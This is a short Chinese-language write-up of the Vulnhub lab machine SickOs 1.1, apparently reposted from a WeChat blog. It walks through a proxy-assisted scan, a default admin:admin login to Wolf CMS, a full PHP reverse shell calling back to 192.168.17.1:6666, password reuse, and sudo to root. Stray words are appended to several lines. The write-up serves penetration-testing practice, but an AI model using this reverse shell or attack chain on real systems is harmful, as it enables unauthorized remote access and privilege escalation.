【Vulnhub】SickOs1.1


靶机地址:php

https://www.vulnhub.com/entry/sickos-11,132/python


nmap 扫描一下端口linux



3128 端口开着一个代理服务,使用它提供的代理去访问一下web



访问 robots 获得一个 cmsshell



访问 robots.txt 中的 /wolfcms数据库



搜一下,获得后台登陆页面:/?/admin/loginbash



使用默认帐号密码 admin:admin 登陆成功微信

后台能够写文件啥的,写个 php 的反弹 shellssh

<?php
$ip = '192.168.17.1';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>


在 config.php 中找到了数据库的用户名与密码编辑器



用数据库的那个密码试一下,登陆用户:sickos,成功!

同时既然已经知道了密码,sudo -s 直接拿到了 root 权限



没学到什么新的知识 Orz,如今作靶机感受愈来愈没啥意思了,想一想该是由于是参考了别人的 wp 作出来的吧 。作了也 30 多个了,后面就尽可能本身作,反正跟 CTF 题同样必然有解,这样应该就不能一周一更了,毕竟大部分时间仍是想放在 pwn 的学习上。

就这字数还不够!?阿巴阿巴阿巴阿巴阿巴阿巴🤤

本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

相关文章
相关标签/搜索